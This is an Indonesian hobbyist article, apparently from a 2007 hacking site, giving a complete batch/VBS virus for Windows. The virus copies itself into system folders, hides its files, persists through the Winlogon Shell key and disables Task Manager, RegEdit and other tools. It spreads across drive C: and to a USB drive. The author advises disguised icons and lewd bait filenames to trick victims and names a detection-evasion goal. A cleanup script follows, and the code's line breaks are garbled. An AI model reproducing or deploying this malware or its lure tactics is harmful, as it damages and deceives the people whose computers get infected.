Anda di halaman 1dari 14

Bikin virus(virusan) pake Quick Batch File Compiler (quick bfc) Date: Wednesday,

January 31, 2007 Hits: 168 By: fanatiCanz mailto:?subject=Bikin virus(virusan) pake
Quick Batch File Compiler (quick bfc)&body=http://www.jasakom.com/article.aspx?

ID=871
mailto:?subject=Bikin virus(virusan)
pake Quick Batch File Compiler (quick
bfc)&body=http://www.jasakom.com/article.aspx?ID=871To the point aja. Setiap kali
saya online internet, saya selalu sempatkan diri untuk mampir di situs jasakom ini.
Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas
nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saya
layak disebut sebagai virus, walaupun masih virus-virusan.
Kenapa saya pede sekali dengan menyebut program ini sebagai virus? Karna program
yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila
dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan
program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang
terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma
buat iseng doang ko, cuma main-main diregistry.
Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai.
Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah
nulis artikel Bikin Virus Dengan Perintah CMD, karna program ini adalah pemikiran
lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar
besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat
bukunya; Pemrograman Virus dan Spyware (uncensored), diterbitkan oleh jasakom.
Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah :
1. Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com
(apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe
(executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD.
Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console.
Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela
console tapi tetap bekerja!! Hebat kan neh software.
2. Software Icon Changer
(apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna
iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari
Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com .
3. Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS)
dan ga takut bermain di RegEdit.
Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik
script dibawah ini:

1. @echo off
2. If exist
c:\windows\exp
loler.exe Goto
lanjut
3. for %%a in
(*.exe) do if %
%~za equ
123456 copy
"%%a"
%systemroot
%\exploler.exe
4. copy
c:\windows\exp
loler.exe
c:\rahasia
gua.exe
5. echo on error
resume
next>c:\window
s\gila.vbs
6. echo Dim
WshShell, f1,
fso,
f2>>c:\window
s\gila.vbs
7. echo set
WshShell =
CreateObject("
Wscript.Shell")
>>c:\windows\g
ila.vbs
8. echo set fso =
CreateObject("
Scripting.FileSy
stemObject")>>
c:\windows\gila
.vbs
9. echo set f1 =
fso.GetFile("C:\
WINDOWS\ex
ploler.exe")>>c:
\windows\gila.v

bs
10. echo set
f2=fsoGetFile(
C:\windows\gil
a.vbs)>>c:\win
dows\gila.vbs
11. echo
f1.Attributes =
"3">>c:\windo
ws\gila.vbs
12. echo
f2.Attributes
=3>>c:\wind
ows\gila.vbs
13. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\Explorer\N
oRun", "1",
"REG_DWOR
D">>c:\window
s\gila.vbs
14. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\Explorer\N
oDrives", "29",
"REG_DWOR
D">>c:\window
s\gila.vbs
15. echo
WshShell.Reg
Write
"HKEY_CURR

ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\Explorer\N
oViewOnDrive"
, "29",
"REG_DWOR
D">>c:\window
s\gila.vbs
16. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\system\Dis
ableRegistryTo
ols", "1",
"REG_DWOR
D">>c:\window
s\gila.vbs
17. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\Explorer\N
oFolderOptions
", "1",
"REG_DWOR
D">>c:\window
s\gila.vbs
18. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr

entVersion\Poli
cies\Explorer\N
oFind", "1",
"REG_DWOR
D">>c:\window
s\gila.vbs
19. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Windows\Curr
entVersion\Poli
cies\system\Dis
ableTaskMgr",
"1",
"REG_DWOR
D">>c:\window
s\gila.vbs
20. echo
WshShell.Reg
Write
"HKEY_CURR
ENT_USER\So
ftware\Microsof
t\Internet
Explorer\Main\
Start Page",
"http://fanatican
z.blogspot.com"
,
"REG_SZ">>c:
\windows\gila.v
bs
21. echo
WshShell.Reg
Write
"HKEY_LOCA
L_MACHINE\
SOFTWARE\M
icrosoft\Windo
ws
NT\CurrentVers
ion\Winlogon\S

hell",
"Explorer.exe
C:\WINDOWS\
exploler.exe",
"REG_SZ">>c:
\windows\gila.v
bs
22. echo
WshShell.Reg
Write
"HKEY_LOCA
L_MACHINE\
SOFTWARE\M
icrosoft\Windo
ws
NT\CurrentVers
ion\RegisteredO
rganization",
"rastaman",
"REG_SZ">>c:
\windows\gila.v
bs
23. echo
WshShell.Reg
Write
"HKEY_LOCA
L_MACHINE\
SOFTWARE\M
icrosoft\Windo
ws
NT\CurrentVers
ion\RegisteredO
wner",
"fanatiCanz",
"REG_SZ">>c:
\windows\gila.v
bs
24. :lanjut
25. call
c:\windows\gila
.vbs
26. if exist
c:\legalin_ganja
_dong_by_fanat

iCanz.exe goto
ceki
27. for /R c:\ %%d
in
(legalin_ganja_
dong_by_fanati
Canz.exe) do
copy
c:\windows\exp
loler.exe "%
%d"
28. Goto ceki
29. :infek1
30. for %%a in
(*.exe) do if %
%~za equ
12345 copy "%
%a"
%systemroot
%\exploler.exe
31. Goto ceki
32. :infek2
33. Copy
c:\windows\exp
loler.exe
c:\gambar
lucu.exe
34. Goto ceki
35. :infek3
36. Copy
c:\windows\exp
loler.exe
f:\koleksi
kartun
flash.exe
37. Goto ceki
38. :cekf
39. if exist
f:\koleksi
kartun
flash.exe Goto

ceki
40. Goto infek3
41. :ceki
42. if not exist
c:\windows\exp
loler.exe Goto
infek1
43. if not exist
c:\gambar
lucu.exe Goto
infek2
44. if exist f:\ Goto
cekf
45. Goto ceki
Waaahhhh panjang ya?jangan bilang iya, soale mungkin nanti disaat
menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!!
Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin
puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas.
Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan
script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensinya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen
dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan
33 yang for %%a in dst. Diganti jadi copy %0 tujuan dan nama file nya.
Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan
pake quickbfc lalu compile dengan ektensi .exe namanya terserah,
contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua
yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan
berdoalah semoga kompie calon korban ngga pake anti virus!.
Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan
dapet penjelasan dari script diatas!
Dan penjelasannya adalah:
Baris
46. Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang
harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini
adalah proyek ghost application! Tapi bodo ah!!)
47. Ini perintah untuk mengecek keberadaan file explorer.exe di drive
c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung
menuju parameter perintah lanjut, tapi kalo belum ada maka akan
dilanjutkan ke baris selanjutnya.

48. perintah untuk menyalin program ini ke folder c:\windows dengan nama
explorer.exe yang selanjutnya akan menjadi file induk program ini.
Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi
.bat maka perintah for %%a in (*.exe) do if %%~za equ 123456 copy "%
%a" %systemroot%\exploler.exe diganti jadi copy %0. Nah, kalo pake
software Quickbfc perintah copy %0 tidak berfungsi. (lengkapnya baca
artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD)
49. perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\
dengan nama rahasia gua.exe
50. perintah di baris ini sampai baris 23 adalah perintah yang menggunakan
parameter > dan >> untuk membuat sebuah file Visual Basic Script yang
bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil
dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang
memblok akses ke registry antivirus yang saya pake ANTIvir, file .vbs ini
berjalan mulus berarti sukses. Tetapi ketika saya coba pake xxxx ada
warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau
dikarantin-.
Sukur-sukur si calon korban ga make anti virus, tentram damai program
ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke
registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk
mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti
attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga
kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan are you sure
want to add the information in nama_file.reg to the registry? ga efisien
banget kan? Oke, kembali ke.? Registry. Dan registry yang di isi
adalah :
1. Menghilangkan menu RUN
2. Menyembunyikan drive A, C, D dan E di windows explorer
3. Menyembunyikan semua file di drive A, C, D dan E windows
explorer (bakalan ada pembatasan!)
4. Men-disable kan menu RegEdit
5. Menghilangkan menu Folder Option
6. Menghilangkan menu Search
7. Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan)
8. Mengganti alamat default Internet Explorer menjadi
http://fanaticanz.blogspot.com
9. Menjadikan file exploler.exe di drive c:\windows yang tadi
disalin(copy) selalu dijalankan ketika computer di hidupkan lagi
walaupun windows masuk ke dalam safe mode!
10. Entry yang ini bakalan merubah nama owner organitation(coba deh
kalian klik kanan di my computer trus pilih properties, dan liat di

situ ada tulisan "registered to:) nah, entry yang satu ini akan
merubah nama organization yang tadinya apapun menjadi
rastaman
11. Sama, entry yang satu ini juga merubah nama owner (cek lagi aja
di properties my computer) yang tadinya apapun menjadi
fanaticanz
Puh.. selesai juga tentang Registry. Masih mau lanjut???? lanjut
mang
24. kosong
25. ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26
28
26. ini perintah yang akan mengeksekusi file gila di folder c:\windows
27. ini perintah yang mempertanyakan keberadaan file legalin ganja dong by
fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter
perintah ceki
28. ini perintah untuk menggandakan file induk exploler.exe yang ada di drive
C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan
nama legalin_ganja_dong_by_fanatiCanz.exe ((((thanks a lot for
tomplix))))
29. ini perintah untuk langsung menuju parameter perintah ceki (baris 47)
30. kosong
31. ini parameter yang membuat kumpulan perintah bernama infek1 yang
berisikan perintah dari baris 33 34
32. perintah ini untuk menyalin file program ini dan sedang dijalankan
(eksekusi) ke folder c:\windows dengan nama exploler.exe
33. ini perintah yang merujuk langsung ke parameter perintah ceki
34. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
35. parameter yang membuat kumpulan perintah bernama infek2 yang
berisikan perintah dari baris 37 38.
36. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan
nama gambar lucu.exe
37. ini perintah yang langsung merujuk ke perintah ceki
38. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
39. ini parameter yang membuat kumpulan perintah bernama indek3 yang
berisikan perintah dari baris 41 42
40. ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan
nama koleksi kartun flash.exe
41. ini perintah yang merujuk langsung ke parameter perintah ceki
42. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)

43. ini parameter yang membuat kumpulan perintah bernama cekf yang
berisikan kumpulan perintah dari baris 45-46
44. ini perintah yang mempertanyakan keberadaan file koleksi kartun
flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter
perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek
maka akan dilanjutkan ke perintah pada baris selanjutnya.
45. ini perintah yang langsung merujuk kepada parameter perintah ceki
46. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
47. ini parameter yang membuat kumpulan perintah bernama ceki yang
berisikan kumpulan perintah dari baris 49-51.
48. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive
c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah)
dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan
perintah yang sama pada baris 3 dan 33.
49. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di
drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2
50. ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal
dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju
perintah selanjutnya
51. kosong
52. ini perintah untuk kembali lagi ke parameter perintah ceki, semcam
looping lah
Puuhhh.. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan
dijawab iya!). Namanya juga belajar, bersusah-susah dululah, nanti bersenang-senang
kalau sudah sukses kaya Mas Sto atau Mas Wardana (kedua orang ini walaupun gua ga
pernah liat langsung, udah gua anggap suhu! Gapapakan mas ?).Oya buat kamu yang
masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca :
1. Buku Pemrograman Virus dan SpyWare [uncensored] karya Wardana, R, S.Hut
terbitan Jasakom
2. Artikel tomPLIX yang judulnya Membuat Virus dengan Perintah CMD di situs
jasakom.com
3. semua yang berhubunagn dengan registry
Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga
adil dong, masa ngasih penyakitnya doang! (iya ga?)
Script Pemulih nya sebagai berikut ;
1. @echo off
2. title Script Pemulih virus-virusan rasta-Farian.B
3. echo on error resume next>c:\gila.vbs

4. echo Dim WshShell, f1, fso>>c:\gila.vbs


5. echo set WshShell = CreateObject("Wscript.Shell")>>c:\gila.vbs
6. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\gila.vbs
7. echo set f1 = fso.GetFile("c:\windows\exploler.exe")>>c:\gila.vbs
8. echo set f2 =fso.GetFile(c:\windows\gila.vbs)
9. echo f1.Attributes = "0">>c:\gila.vbs
10. echo f2.Attributes = 0>>c:\gila.vbs
11. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer\NoRun", "0", "REG_DWORD">>c:\gila.vbs
12. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\syste
m\DisableRegistryTools", "0", "REG_DWORD">>c:\gila.vbs
13. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer\NoViewOnDrives", "0", "REG_DWORD">>c:\gila.vbs
14. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer\NoFolderOptions", "0", "REG_DWORD">>c:\gila.vbs
15. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer\NoFind", "0", "REG_DWORD">>c:\gila.vbs
16. echo WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\syste
m\DisableTaskMgr", "0", "REG_DWORD">>c:\gila.vbs
17. echo WshShell.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe", "REG_SZ">>c:\gila.vbs
18. call c:\gila.vbs
19. pause
20. Goto del1
21. kosong
22. :del1
23. del %systemroot%\exploler.exe
24. pause
25. Goto del2
26. for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del "%%d"

27. pause
28. Goto del3
29. :del3
30. del c:\"gambar lucu".exe
31. pause
32. :del4
33. del %systemroot%\gila.vbs
34. pause
Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16
dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program
virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung
menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi.
Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja
dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin
keperintah selajutnya, dan seterusnya.
Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan
extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih
tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah
bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe,
cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong
by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya
sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua
ritual diatas selesai, computer yang terinfek akan kembali seperti semula.
Viva O Muerte!!
fanatiCanz thank's to:
1. Tuhan YME, atas ganja dan semua kedamaian di alamNya ( kota tidak termasuk,
hanya pantai, gunung, lembah, dan semuanya yang masih murni karya Tuhan)
2. orang-orang yang tulisannya jadi bahan acuan nih artikel : tomPLIX,
natans_hacker, Mas Wardana, rename-rename (yang nulis Anti Deletion File)
dan scarebyte
3. Bequni D GanjaMan http://sibequni.blogspot.com (thank's for your spirit and
your soul!) ~kenapa hati sama otak jarang banget bisa nyambung, ya?
4. Bokap - Nyokap
5. My lit.Sis n Bro PutriAdnanAsya (maaf ya, computer kalian harus dibawa
dulu)
6. Anisa Agustina wuih.. hidden spiritnya banyak banget..! makasih, yah!
7. Devi Akhsari kapan kapan boleh ngobrol?
8. Barudak Angkasa Pura 2 yang masih setia manggil gua si_bego

9. yang nemuin/nyiptain Internet


10. Wiji Thukul & Che Guevara (karna perjuangannya telah melahirkan semangat
juang dalam diri ini!)
11. Iwan Fals & Bob Marley (Sumpah, lirik lagunya banyak nyemangatin gua!!)
12. Dan terimakasih yang sebanyak-banyaknya buat kamu yang udah mau baca
tulisan ini sampai huruf terakhir.. hiks..hiks.. (!terharu saya jadinya!)
Dan terakhir (lagi lagi terakhir.. ;-), izinkanlah saya untuk membacakan (baca:mengetikan)
sebuah puisi karya Wiji Thukul :
Kemerdekaan
Kemerdekaan mengajarkan aku berbahasa
membangun kata-kata
dan mengucapkan kepentingan
kemerdekaan
mengajar aku menuntut
dan menulis surat selebaran
kemerdekaanlah yang membongkar kuburan ketakutan dan menunjukkan jalan
kemerdekaan adalah gerakan yang tak terpatahkan!
Kemerdekaan
Selalu di garis depan!!

fanatiCanz rasta-farian.B'